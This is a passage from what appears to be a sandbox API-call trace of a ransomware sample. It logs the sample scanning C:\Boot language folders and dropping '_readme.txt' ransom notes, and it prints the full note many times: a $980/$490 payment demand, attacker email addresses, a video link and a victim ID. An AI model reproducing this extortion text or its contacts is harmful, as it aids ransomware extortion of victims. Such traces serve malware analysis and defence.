ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.873] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned=".mui" [0228.873] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.873] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.873] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.874] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.874] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0228.874] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.874] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.874] PathFindFileNameW (pszPath="") returned="" [0228.874] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.874] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.874] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.874] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.874] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0228.874] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0228.874] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.875] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.875] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.875] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.875] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned=".mui" [0228.875] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.875] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.875] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.875] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.875] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0228.875] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.875] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.875] PathFindFileNameW (pszPath="") returned="" [0228.876] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.876] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.876] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.876] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.876] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0228.876] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0228.876] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.876] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.876] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.877] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.877] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned=".mui" [0228.877] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.877] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.877] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.877] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.877] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0228.877] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.877] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.877] PathFindFileNameW (pszPath="") returned="" [0228.877] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.878] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.878] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.878] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.878] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0228.878] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0228.878] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.878] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.878] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.878] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.878] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned=".mui" [0228.878] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.879] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.879] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.879] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.879] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0228.879] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.879] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.879] PathFindFileNameW (pszPath="") returned="" [0228.879] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.879] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.879] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.879] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.879] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0228.879] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0228.880] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our 